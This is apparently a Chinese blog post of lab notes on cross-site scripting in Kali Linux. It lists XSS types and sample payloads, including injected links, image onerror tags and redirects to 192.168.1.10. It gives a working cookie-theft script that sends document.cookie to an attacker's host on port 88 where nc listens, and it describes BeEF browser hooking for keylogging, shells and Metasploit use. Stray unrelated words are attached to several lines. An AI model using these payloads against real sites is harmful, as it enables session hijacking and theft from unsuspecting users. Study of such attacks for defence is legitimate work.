kali linux之xss

攻擊web客戶端javascript

客戶端腳本語言(彈窗,廣告,在瀏覽器中執行,javascript)php

javascript--與java語言無關,使用最廣的客戶端腳本語言html

 

xss(cross-site scripting)java

經過web站點漏洞,向客戶端交付惡意腳本代碼,實現對客戶端攻擊目的web

注入客戶端腳本代碼,盜取cookie,重定向shell

 

使用場景:瀏覽器

直接嵌入html:<script> alert('xss'); </script>ruby

元素標籤事件:<body onload=alert('xss')>服務器

圖片標籤:<img src="javascript:alert('xss');">cookie

其餘標籤:<iframe>,<div>,and<link>

dom對象,篡改頁面內容

 

 

漏洞造成的根源:

服務器對用戶提交數據過濾不嚴

提交給服務器的腳本被直接返回給其餘客戶端執行

腳本在客戶端執行惡意操做

 

xss漏洞類型

存儲型(持久型)

反射型(非持久)

DOM型

 

 

漏洞poc

<script> alert('xss')</script> 驗證彈窗

<a href=http://192.168.1.10>click  嵌入連接

<img src=http://192.168.1.10/xxsec.jpeg onerror=alert('xss')>  嵌入192.168.1.10的圖片

 <script>window.location='http://192.168.1.10'</script> 提交重定向到192.168.1.10

 

反射型xss

彈窗驗證

 

 

 <a href=http://192.168.1.10>click 點擊click就跳轉到連接

 

 

<img src=http://192.168.1.10/xxsec.jpeg onerror=alert('xss')>  嵌入192.168.1.10的圖片

 

 <script>window.location='http://192.168.1.10'</script> 提交重定向到192.168.1.10

 

 

 

xss竊取cookie

<script src=http://192.168.1.10/xxsec.js></script>

xxsec.js源碼

var img = new Image();
img.src = "http://192.168.1.10:88/cookies.php?cookie="+document.cookie;(把cookie發送到192.168.1.10 88端口)

 

在本機服務器寫好源碼,而後用nc監聽好本機的88端口

 

執行就獲取到cookie了

 

 

 

存儲型xss

長期存儲於服務器端,每次用戶訪問都會被執行javascript腳本

name:客戶端表單長度限制--客戶端,截斷代理

 

竊取cookie源碼

<script src=http://192.168.1.10/xxsec.js></script>

xxsec.js源碼

var img = new Image();
img.src = "http://192.168.1.10:88/cookies.php?cookie="+document.cookie;(把cookie發送到192.168.1.10 88端口)

 

 

 成功獲取cookie

 

 

 

beef

生成,交互payload

ruby語言編寫

服務器端--------管理hooked客戶端

客戶端---------運行客戶端瀏覽器的javascript腳本(hook)

 

瀏覽器攻擊面:

應用廣泛轉移到b/s架構,瀏覽器成爲統一客戶端程序

結合社會工程學方法對瀏覽器進行攻擊,攻擊瀏覽器用戶

經過注入js腳本,利用瀏覽器攻擊其餘網站

 

攻擊手段:

利用網站xss漏洞實現攻擊

誘使客戶端訪問含有hook的僞造站點

結合中間人攻擊注入hook腳本

 

常見用途:

鍵盤記錄

網絡掃描

瀏覽器信息收集

綁定shell

與metasploit集成

 

 

默認用戶名密碼beef

 

Details:瀏覽器,插件版本信息,操做系統信息

Logs:瀏覽器動做----焦點變化,鼠標點擊,信息輸入

Commands:命令模塊

         綠色模塊:表示模塊適合目標瀏覽器,而且執行結果被客戶端不可見

         紅色模塊:表示模塊不適用當前用戶,有些紅色模塊也能夠正常執行

         橙色模塊:模塊可用,但結果對用戶可見(CAM彈窗申請權限等)

         灰色模塊:模塊未在目標瀏覽器上測試過

 

主要模塊

Browsers

Exploits

Host

Persistence

Network

 

 

 

友情連接 http://www.cnblogs.com/klionsec

               http://www.cnblogs.com/l0cm

               http://www.cnblogs.com/Anonyaptxxx

               http://www.feiyusafe.cn

相關文章
相關標籤/搜索